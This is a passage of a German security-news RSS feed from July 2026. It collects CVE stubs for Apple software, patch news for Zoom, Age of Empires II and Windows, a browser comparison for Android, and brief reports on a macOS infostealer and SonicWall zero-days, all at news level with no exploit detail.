<link>https://tsecurity.de/de/3675241/sicherheitsluecken/cve-2026-43716-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-327461/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675241/sicherheitsluecken/cve-2026-43716-apple-safariiosipadosmacos-up-to-2651-web-denial-of-service-nessus-id-327461/</guid>
<pubDate>Fri, 17 Jul 2026 08:39:49 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects some unknown processing of the component <em>Web Handler</em>. The manipulation results in denial of service.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2026-43716">CVE-2026-43716</a>. It is possible to launch the attack remotely. No exploit is available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43745 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web out-of-bounds write (Nessus ID 327458)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been classified as critical. This impacts an unknown function of the component Web Handler. Performing a manipulation results in out-of-bounds write.

This vulnerability is reported as CVE-2026-43745. The attack...]]></description>
<link>https://tsecurity.de/de/3675240/sicherheitsluecken/cve-2026-43745-apple-safariiosipadosmacos-up-to-2651-web-out-of-bounds-write-nessus-id-327458/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675240/sicherheitsluecken/cve-2026-43745-apple-safariiosipadosmacos-up-to-2651-web-out-of-bounds-write-nessus-id-327458/</guid>
<pubDate>Fri, 17 Jul 2026 08:39:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been classified as <a href="https://vuldb.com/kb/risk">critical</a>. This impacts an unknown function of the component <em>Web Handler</em>. Performing a manipulation results in out-of-bounds write.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-43745">CVE-2026-43745</a>. The attack is possible to be carried out remotely. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android-Browser: Die 5 besten Chrome-Alternativen]]></title>
<description><![CDATA[Diese Chrome-Alternativen für Ihr Android-Smartphone helfen gegen zu viel Google-Flavor…
					Foto: RAW-films – shutterstock.com




Es gibt diverse (gute) Gründe, auf Google-Apps verzichten zu wollen (allerdings sollte man sich dann auch unter Umständen nicht für ein Android-Telefon entscheiden)...]]></description>
<link>https://tsecurity.de/de/3674956/it-security-nachrichten/android-browser-die-5-besten-chrome-alternativen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674956/it-security-nachrichten/android-browser-die-5-besten-chrome-alternativen/</guid>
<pubDate>Fri, 17 Jul 2026 05:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Diese Chrome-Alternativen für Ihr Android-Smartphone helfen gegen zu viel Google-Flavor…" title="Diese Chrome-Alternativen für Ihr Android-Smartphone helfen gegen zu viel Google-Flavor…" src="https://images.computerwoche.de/bdb/3380571/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Diese Chrome-Alternativen für Ihr Android-Smartphone helfen gegen zu viel Google-Flavor…</p></figcaption></figure><p class="imageCredit">
					Foto: RAW-films – shutterstock.com</p></div>




<p class="wp-block-paragraph">Es gibt diverse (gute) Gründe, auf Google-Apps verzichten zu wollen (allerdings sollte man sich dann auch unter Umständen <a href="https://www.computerwoche.de/article/2823745/die-12-besten-safari-alternativen.html" title="nicht für ein Android-Telefon" target="_blank">nicht für ein Android-Telefon</a> entscheiden). Was auch immer für Ihre Entscheidung ursächlich mag, nicht mit <a href="https://www.computerwoche.de/article/2805495/so-arbeiten-sie-besser-mit-google-chrome.html" title="Chrome" target="_blank">Chrome</a> browsen zu wollen: Im Google Play Store stehen diverse alternative Browser zur Verfügung. Dabei empfiehlt es sich, sich an vertrauenswürdige Marken mit entsprechender Reputation zu halten.</p>



<h2 class="wp-block-heading">Die 5 besten Android-Browser, die nicht Chrome sind</h2>



<p class="wp-block-paragraph">Im Folgenden haben wir die fünf besten Google-Chrome-Alternativen für Ihr <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Smartphone sowie deren wichtigste (Business-)Funktionen in alphabetischer Reihenfolge zusammengestellt.</p>



<p class="wp-block-paragraph"><strong><a href="https://play.google.com/store/apps/details?id=com.duckduckgo.mobile.android&amp;hl=de&amp;gl=US" title="DuckDuckGo Private Browser" target="_blank" rel="noopener">DuckDuckGo Private Browser</a></strong></p>



<p class="wp-block-paragraph">Ähnlich wie bei seinem <a href="https://www.computerwoche.de/article/2776713/die-besten-google-alternativen.html" title="Suchmaschinenangebot" target="_blank">Suchmaschinenangebot</a> legt DuckDuckGo auch bei seinem mobilen Browser für <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> den Fokus auf den Schutz Ihrer Privatsphäre. Soll heißen: Sie können im Netz stöbern, ohne befürchten zu müssen, dass jeder Ihrer Klicks getrackt wird. Das trägt auch zu einem schnelleren Surferlebnis bei.</p>



<p class="wp-block-paragraph">Ein besonders nützliches Feature verbirgt sich dabei hinter einer Schaltfläche mit “Feuer”-Symbolik: Ein Druck auf sie genügt, um sämtliche Registerkarten zu schließen und Surf-Daten zu löschen. Bestimmte Sites können Sie dabei als “fireproof” kennzeichnen. In diesem Fall werden zwar Cookies für Anmeldung oder Warenkorb gesetzt, die Tracking-Versuche von Drittanbietern bleiben jedoch weiterhin wirkungslos.</p>



<p class="wp-block-paragraph">Davon abgesehen zeichnet sich der DuckDuckGo-Browser durch sein klares Design aus: Neue Tabs sind nicht direkt mit News-Meldungen oder Webseiten-Vorschlägen zugepflastert.</p>



<p class="wp-block-paragraph"><strong><a href="https://play.google.com/store/apps/details?id=com.microsoft.emmx&amp;hl=de&amp;gl=US" title="Edge" target="_blank" rel="noopener">Edge</a></strong></p>



<p class="wp-block-paragraph">Wenn Sie im Job Microsoft 365 beziehungsweise Microsofts Edge-Browser verwenden, kann es Sinn machen, den auch auf Ihrem <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Device zu installieren. Etwa, um arbeitsbezogene Browserinformationen die gemeinsam genutzt werden, auf Ihrem Android-Telefon zu synchronisieren.</p>



<p class="wp-block-paragraph">Ähnlich wie bei Chrome sind auch die Datenschutz-Standardeinstellungen von Edge darauf ausgerichtet, Ihre Onlineaktivitäten mit Entwicklern und besuchten Webseiten zu teilen. Allerdings bietet Edge auch die Möglichkeit, Datenschutz- und Sicherheitseinstellungen manuell anzupassen. Eine neue Standardregisterkarte in Edge sieht erst einmal ziemlich unübersichtlich aus: Wie bei den meisten Browsern wird eine Suchleiste und Symbol-Links zu vorgeschlagenen Websites angezeigt. Ein Wisch nach oben führt zu einem (personalisierten) Newsfeed. Darüber hinaus bietet Edge:</p>



<ul class="wp-block-list">
<li><p>einen Lese-Modus für (manche) Webseiten, der der Übersichtlichkeit zuliebe überflüssige Werbeanzeigen aus dem Layout verbannt.</p></li>



<li><p>eine konfigurierbare Textvorlesefunktion für Webseiten. Anpassen lassen sich dabei zum Beispiel Lesegeschwindigkeit sowie Stimm- und Sprechstil. Auch eine Übersetzungsfunktion steht zur Verfügung.</p></li>



<li><p>falls Sie einen Windows 10- oder 11-PC besitzen, die Möglichkeit, Dokumente und Dateien auf OneDrive hochzuladen/zu synchronisieren.</p></li>



<li><p>KI-Funktionen.</p></li>
</ul>



<p class="wp-block-paragraph"><strong><a href="https://play.google.com/store/apps/details?id=org.mozilla.firefox&amp;hl=de&amp;gl=US" title="Firefox" target="_blank" rel="noopener">Firefox</a> (<a href="https://play.google.com/store/apps/details?id=org.mozilla.klar&amp;hl=de&amp;gl=US" title="Klar" target="_blank" rel="noopener">Klar</a>)</strong></p>



<p class="wp-block-paragraph">Wie bei Edge wird auch bei <a href="https://www.computerwoche.de/article/2816844/mozilla-sucht-den-suendenbock.html" title="Firefox" target="_blank">Firefox</a> standardmäßig eine neue Registerkarte mit einem Suchmaschinenfeld, Links zu vorgeschlagenen Websites und einem Bereich mit Nachrichten und Artikeln geladen. Der Browser bietet unter anderem die Möglichkeit, Daten geräteübergreifend zu synchronisieren und einen Edge-ähnlichen Lesemodus für Webseiten. Wie bei der Desktop-Version können Sie die Funktionen von Firefox auch auf Ihrem <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Device über Add-ons erweitern.</p>



<p class="wp-block-paragraph">Darüber hinaus bietet Mozilla Firefox auch für <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a> in einer “Light”-Version namens Firefox Klar an. Dieser Browser setzt standardmäßig ein strengeres Datenschutzniveau durch und blockiert automatisch Tracker und Werbung. Ähnlich wie beim Browser von DuckDuckGo löschen Sie bei Firefox mit einem Tastendruck (auf das Mülleimer-Symbol) direkt alle Passwörter und Cookies.</p>



<p class="wp-block-paragraph">Firefox Klar zeichnet sich durch eine minimalistische, aufgeräumte Oberfläche aus, lässt aber den Lesemodus vermissen – und eine Registerkartenfunktion. Dadurch sind Sie gezwungen, sich auf eine einzelne Webseite zu fokussieren, dafür aber mit maximaler Performanz. </p>



<p class="wp-block-paragraph"><strong><a href="https://play.google.com/store/apps/details?id=com.opera.browser&amp;hl=de&amp;gl=US" title="Opera" target="_blank" rel="noopener">Opera</a></strong></p>



<p class="wp-block-paragraph">Opera wirft das unübersichtlichste aller Standard-Browser-Tabs in die Waagschale und listet extrem viele News- und Artikelvorschläge, die mit diversen Sponsored-Beiträgen durchsetzt sind. Das können Sie glücklicherweise mit einigen Klicks auch deaktivieren. <a href="https://www.computerwoche.de/article/2820772/opera-streckt-fuehler-nach-ki-technik-aus.html" title="Opera" target="_blank">Opera</a> für <a href="https://www.computerwoche.de/mobile/" target="_blank" class="idgGlossaryLink">Android</a>-Telefone will darüber hinaus mit folgenden Features punkten:</p>



<ul class="wp-block-list">
<li><p>einem Lesemodus für Webseiten (funktioniert ähnlich wie bei Edge und Firefox);</p></li>



<li><p>der Funktion “My Flow”, mit deren Hilfe Sie Links, Bilder, Videos und andere Dateien in einem verschlüsselten Speicher ablegen können, der sich geräteübergreifend synchronisieren lässt;</p></li>



<li><p>einer integrierten VPN-Funktionalität;</p></li>



<li><p>KI-Funktionen. </p></li>
</ul>



<p class="wp-block-paragraph">Für kein Geld sollen Sie bei letztgenannter Funktion nicht zu viel erwarten: Opera stellt lediglich drei Regionen zur Wahl (Amerika, Asien und Europa) und funktioniert nur innerhalb des Browsers selbst. Wenn Sie Server in einem spezifischen Land wählen und ihren gesamten Traffic tunneln möchten, brauchen Sie ein Pro-Abo bei Opera (ab 4 Euro monatlich). (fm)</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel ist <a href="https://www.computerworld.com/article/1626416/chrome-alternatives-android-browsers.html" target="_blank">im Original</a> bei unserer Schwesterpublikation Computerworld.com erschienen.</strong></p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to delete Grammarly from Mac — Complete uninstall guide]]></title>
<description><![CDATA[Learn how to fully delete Grammarly from your Mac, including the desktop app, Safari extension, and Word add-in. Remove leftover files cleanly — easier with Setapp tools.]]></description>
<link>https://tsecurity.de/de/3674619/ios-mac-os/how-to-delete-grammarly-from-mac-complete-uninstall-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674619/ios-mac-os/how-to-delete-grammarly-from-mac-complete-uninstall-guide/</guid>
<pubDate>Thu, 16 Jul 2026 22:39:27 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn how to fully delete Grammarly from your Mac, including the desktop app, Safari extension, and Word add-in. Remove leftover files cleanly — easier with Setapp tools.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to clear app cache on iPhone to free up space: The fastest way to free up space]]></title>
<description><![CDATA[Learn how to clear app cache on iPhone with step-by-step methods for Safari, third-party apps, and storage settings.]]></description>
<link>https://tsecurity.de/de/3674173/ios-mac-os/how-to-clear-app-cache-on-iphone-to-free-up-space-the-fastest-way-to-free-up-space/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674173/ios-mac-os/how-to-clear-app-cache-on-iphone-to-free-up-space-the-fastest-way-to-free-up-space/</guid>
<pubDate>Thu, 16 Jul 2026 18:43:41 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Learn how to clear app cache on iPhone with step-by-step methods for Safari, third-party apps, and storage settings.]]></content:encoded>
</item>
<item>
<title><![CDATA[Kritischer Fehler in Zoom erlaubt Kontoübernahme - it-daily.net]]></title>
<description><![CDATA[Neben der kritischen Lücke behebt das aktuelle Update-Paket von Zoom drei weitere Sicherheitsmängel, die einen hohen Schweregrad aufweisen: CVE-2026- ...]]></description>
<link>https://tsecurity.de/de/3673567/it-security-nachrichten/kritischer-fehler-in-zoom-erlaubt-kontouebernahme-it-dailynet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673567/it-security-nachrichten/kritischer-fehler-in-zoom-erlaubt-kontouebernahme-it-dailynet/</guid>
<pubDate>Thu, 16 Jul 2026 15:10:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Neben der kritischen Lücke behebt das aktuelle Update-Paket von Zoom drei weitere Sicherheitsmängel, die einen hohen Schweregrad aufweisen: CVE-2026- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft behebt schwere Sicherheitslücke in Age of Empires 2]]></title>
<description><![CDATA[Microsoft hat eine schwerwiegende Sicherheitslücke in der überarbeiteten Version des Strategiespiels „Age of Empires 2“ behoben. Die Sicherheitslücke ermöglichte es Angreifern, die Kontrolle über den Computer eines Nutzers zu übernehmen, indem sie eine speziell gestaltete Spieleinladung versendet...]]></description>
<link>https://tsecurity.de/de/3673528/it-nachrichten/microsoft-behebt-schwere-sicherheitsluecke-in-age-of-empires-2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673528/it-nachrichten/microsoft-behebt-schwere-sicherheitsluecke-in-age-of-empires-2/</guid>
<pubDate>Thu, 16 Jul 2026 15:03:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft hat eine schwerwiegende Sicherheitslücke in der überarbeiteten Version des Strategiespiels „<a href="https://amazon.de/dp/B07ZGFSZ31?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Age of Empires 2</a>“ behoben. Die Sicherheitslücke ermöglichte es Angreifern, die Kontrolle über den Computer eines Nutzers zu übernehmen, indem sie eine speziell gestaltete Spieleinladung versendeten, berichtet <a href="https://techcrunch.com/2026/07/15/microsoft-patches-bug-in-video-game-age-of-empires-ii/">TechCrunch</a>.</p>



<p>Nach Angaben des Cybersicherheitsunternehmens <a href="https://www.rapid7.com/blog/post/em-patch-tuesday-july-2026/">Rapid7</a> könnte ein erfolgreicher Angriff schädliche Dateien auf dem Computer des Opfers platzieren und es dem Hacker praktisch ermöglichen, die Kontrolle über den gesamten Computer zu übernehmen.</p>



<p>Derzeit liegen keine Hinweise darauf vor, dass die Sicherheitslücke in „Age of Empires 2“ bei tatsächlichen Angriffen ausgenutzt wurde.</p>



<p>Die Sicherheitslücke wurde im Rahmen des <a href="https://www.pcwelt.de/article/3191057/microsofts-monster-patchday-sprengt-alle-rekorde.html" target="_blank" rel="noreferrer noopener">umfangreichen Microsoft-Patchdays am Dienstag</a> gestopft, bei dem das Unternehmen eine große Anzahl von Sicherheitslücken in seinen Produkten behoben hat.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Für Pixel-Handys: Android 17 bringt 3 wichtige Änderungen für diese Nutzer]]></title>
<description><![CDATA[Wenn du aktuell mit Problemen in den Schnelleinstellungen zu kämpfen hast, könnte das neue Android-Update interessant für dich sein. Es behebt gleich drei Fehler.]]></description>
<link>https://tsecurity.de/de/3673454/it-nachrichten/fuer-pixel-handys-android-17-bringt-3-wichtige-aenderungen-fuer-diese-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673454/it-nachrichten/fuer-pixel-handys-android-17-bringt-3-wichtige-aenderungen-fuer-diese-nutzer/</guid>
<pubDate>Thu, 16 Jul 2026 14:33:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn du aktuell mit Problemen in den Schnelleinstellungen zu kämpfen hast, könnte das neue Android-Update interessant für dich sein. Es behebt gleich drei Fehler.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zoom behebt kritische Windows-Sicherheitslücke gegen Account-Übernahmen]]></title>
<description><![CDATA[LONDON (IT BOLTWISE) – Zoom hat Sicherheitsupdates für eine kritische Windows-Schwachstelle veröffentlicht, die laut Advisory eine Account-Übernahme über Netzwerkzugriff ermöglichen kann. Betroffen sind mehrere Zoom-Clients und SDK-Komponenten, darunter der Desktop Client sowie der Meeting SDK fü...]]></description>
<link>https://tsecurity.de/de/3673193/it-security-nachrichten/zoom-behebt-kritische-windows-sicherheitsluecke-gegen-account-uebernahmen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3673193/it-security-nachrichten/zoom-behebt-kritische-windows-sicherheitsluecke-gegen-account-uebernahmen/</guid>
<pubDate>Thu, 16 Jul 2026 13:08:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-zoom-windows-security-patch.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-zoom-windows-security-patch.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-zoom-windows-security-patch-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-zoom-windows-security-patch-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-zoom-windows-security-patch-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-zoom-windows-security-patch-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-zoom-windows-security-patch-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">LONDON (IT BOLTWISE) – Zoom hat Sicherheitsupdates für eine kritische Windows-Schwachstelle veröffentlicht, die laut Advisory eine Account-Übernahme über Netzwerkzugriff ermöglichen kann. Betroffen sind mehrere Zoom-Clients und SDK-Komponenten, darunter der Desktop Client sowie der Meeting SDK für Windows. Zusätzlich schließt Zoom weitere Hochrisiko-Lücken, die bis in den Bereich Privilege Escalation reichen. Für Unternehmen bedeutet das: kurzfristig […]</p>
<div><a href="https://www.it-boltwise.de/zoom-behebt-kritische-windows-sicherheitsluecke-gegen-account-uebernahmen.html">... den vollständigen Artikel <strong>»Zoom behebt kritische Windows-Sicherheitslücke gegen Account-Übernahmen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/zoom-behebt-kritische-windows-sicherheitsluecke-gegen-account-uebernahmen.html">Zoom behebt kritische Windows-Sicherheitslücke gegen Account-Übernahmen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft behebt kritische Sicherheitslücke in Age of Empires II - Zamin.uz]]></title>
<description><![CDATA[Hacker konnten sich Zugriff auf das System eines Opfers verschaffen, indem sie eine speziell präparierte Spieleinladung versendeten. Laut iXBT.com ...]]></description>
<link>https://tsecurity.de/de/3672973/hacking/microsoft-behebt-kritische-sicherheitsluecke-in-age-of-empires-ii-zaminuz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672973/hacking/microsoft-behebt-kritische-sicherheitsluecke-in-age-of-empires-ii-zaminuz/</guid>
<pubDate>Thu, 16 Jul 2026 11:36:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Hacker</b> konnten sich Zugriff auf das System eines Opfers verschaffen, indem sie eine speziell präparierte Spieleinladung versendeten. Laut iXBT.com ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Pair Stolen Wallet Databases With Keychain Passwords for Offline Crypto Theft]]></title>
<description><![CDATA[A macOS-focused information stealer is combining stolen wallet databases with credentials harvested from the Apple Keychain, browsers, and Apple Notes to conduct offline cryptocurrency theft attempts. Detected by the MistEye security monitoring system, the malware appears designed for broad data ...]]></description>
<link>https://tsecurity.de/de/3672880/it-security-nachrichten/hackers-pair-stolen-wallet-databases-with-keychain-passwords-for-offline-crypto-theft/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672880/it-security-nachrichten/hackers-pair-stolen-wallet-databases-with-keychain-passwords-for-offline-crypto-theft/</guid>
<pubDate>Thu, 16 Jul 2026 11:09:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A macOS-focused information stealer is combining stolen wallet databases with credentials harvested from the Apple Keychain, browsers, and Apple Notes to conduct offline cryptocurrency theft attempts. Detected by the MistEye security monitoring system, the malware appears designed for broad data collection rather than a single targeted objective. Its collection scope includes macOS Keychain files, Safari […]</p>
<p>The post <a href="https://gbhackers.com/hackers-pair-stolen-wallet-databases/">Hackers Pair Stolen Wallet Databases With Keychain Passwords for Offline Crypto Theft</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[macOS Infostealer Steals Telegram Sessions and Replaces Ledger and Trezor Wallet Apps]]></title>
<description><![CDATA[SlowMist has uncovered a macOS information-stealing malware that can hijack Telegram sessions, collect credentials, steal cryptocurrency wallet data, and replace legitimate Ledger and Trezor applications with phishing-capable web wrappers. Detected by SlowMist’s MistEye monitoring platform, the m...]]></description>
<link>https://tsecurity.de/de/3672759/it-security-nachrichten/macos-infostealer-steals-telegram-sessions-and-replaces-ledger-and-trezor-wallet-apps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672759/it-security-nachrichten/macos-infostealer-steals-telegram-sessions-and-replaces-ledger-and-trezor-wallet-apps/</guid>
<pubDate>Thu, 16 Jul 2026 10:08:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>SlowMist has uncovered a macOS information-stealing malware that can hijack Telegram sessions, collect credentials, steal cryptocurrency wallet data, and replace legitimate Ledger and Trezor applications with phishing-capable web wrappers. Detected by SlowMist’s MistEye monitoring platform, the malware appears designed for broad data theft rather than a single targeted objective. It searches macOS Keychain data, Safari […]</p>
<p>The post <a href="https://cyberpress.org/infostealer-hijacks-telegram-wallets/">macOS Infostealer Steals Telegram Sessions and Replaces Ledger and Trezor Wallet Apps</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Erste Nutzer erhalten wichtiges Update – es behebt ein nerviges Problem]]></title>
<description><![CDATA[Google veröffentlicht jetzt ein Update, welches ein nerviges Problem lösen soll. Von der Aktualisierung profitieren sowohl reguläre Nutzer*innen als auch Beta-User*innen.]]></description>
<link>https://tsecurity.de/de/3672714/it-nachrichten/android-auto-erste-nutzer-erhalten-wichtiges-update-es-behebt-ein-nerviges-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672714/it-nachrichten/android-auto-erste-nutzer-erhalten-wichtiges-update-es-behebt-ein-nerviges-problem/</guid>
<pubDate>Thu, 16 Jul 2026 09:48:09 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google veröffentlicht jetzt ein Update, welches ein nerviges Problem lösen soll. Von der Aktualisierung profitieren sowohl reguläre Nutzer*innen als auch Beta-User*innen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android Auto: Erste Nutzer erhalten wichtiges Update – es behebt ein nerviges Problem]]></title>
<description><![CDATA[Google veröffentlicht jetzt ein Update, welches ein nerviges Problem lösen soll. Von der Aktualisierung profitieren sowohl reguläre Nutzer*innen als auch Beta-User*innen.]]></description>
<link>https://tsecurity.de/de/3672593/it-nachrichten/android-auto-erste-nutzer-erhalten-wichtiges-update-es-behebt-ein-nerviges-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672593/it-nachrichten/android-auto-erste-nutzer-erhalten-wichtiges-update-es-behebt-ein-nerviges-problem/</guid>
<pubDate>Thu, 16 Jul 2026 09:18:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google veröffentlicht jetzt ein Update, welches ein nerviges Problem lösen soll. Von der Aktualisierung profitieren sowohl reguläre Nutzer*innen als auch Beta-User*innen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 10: ESU-Update KB5099539 schließt zahlreiche Lücken]]></title>
<description><![CDATA[Windows 10 hat im Rahmen des Programms für erweiterte Sicherheitsupdates (ESU) ein weiteres Update erhalten. Zwar fällt der Umfang geringer aus als zuletzt bei Rekord-Patchday von Windows 11, dennoch schließt Microsoft aktuelle Sicherheitslücken, behebt mehrere Fehler im Betriebssystem und vertei...]]></description>
<link>https://tsecurity.de/de/3672356/it-nachrichten/windows-10-esu-update-kb5099539-schliesst-zahlreiche-luecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672356/it-nachrichten/windows-10-esu-update-kb5099539-schliesst-zahlreiche-luecken/</guid>
<pubDate>Thu, 16 Jul 2026 07:02:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/8/0/3-9c73138a21f0c1ae/article-640x360.138082a8.jpg"><p>Windows 10 hat im Rahmen des Programms für erweiterte Sicherheitsupdates (ESU) ein weiteres Update erhalten. Zwar fällt der Umfang geringer aus als zuletzt bei Rekord-Patchday von Windows 11, dennoch schließt Microsoft aktuelle Sicherheitslücken, behebt mehrere Fehler im Betriebssystem und verteilt neue Secure-Boot-Zertifikate.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft behebt Rekordzahl an Schwachstellen: Künstliche Intelligenz hilft - Zamin.uz]]></title>
<description><![CDATA[Unter den behobenen Fehlern sticht eine kritische Schwachstelle in Windows Server besonders hervor. Dieser Bug ermöglicht es Hackern, ihre ...]]></description>
<link>https://tsecurity.de/de/3671833/windows-server/microsoft-behebt-rekordzahl-an-schwachstellen-kuenstliche-intelligenz-hilft-zaminuz/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671833/windows-server/microsoft-behebt-rekordzahl-an-schwachstellen-kuenstliche-intelligenz-hilft-zaminuz/</guid>
<pubDate>Wed, 15 Jul 2026 22:46:07 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Unter den behobenen Fehlern sticht eine kritische Schwachstelle in <b>Windows Server</b> besonders hervor. Dieser Bug ermöglicht es Hackern, ihre ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Rapid7 MDR Team Discovers New SonicWall SMA1000 Zero Days being Actively Exploited (CVE-2026-15409, CVE-2026-15410)]]></title>
<description><![CDATA[OverviewOn July 14, 2026, SonicWall published a security advisory addressing two vulnerabilities affecting SMA1000 Series remote access appliances, including the critical server-side request forgery (SSRF) vulnerability CVE-2026-15409 (CVSS 10.0) and the high-severity code injection vulnerability...]]></description>
<link>https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671466/it-security-nachrichten/rapid7-mdr-team-discovers-new-sonicwall-sma1000-zero-days-being-actively-exploited-cve-2026-15409-cve-2026-15410/</guid>
<pubDate>Wed, 15 Jul 2026 19:24:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
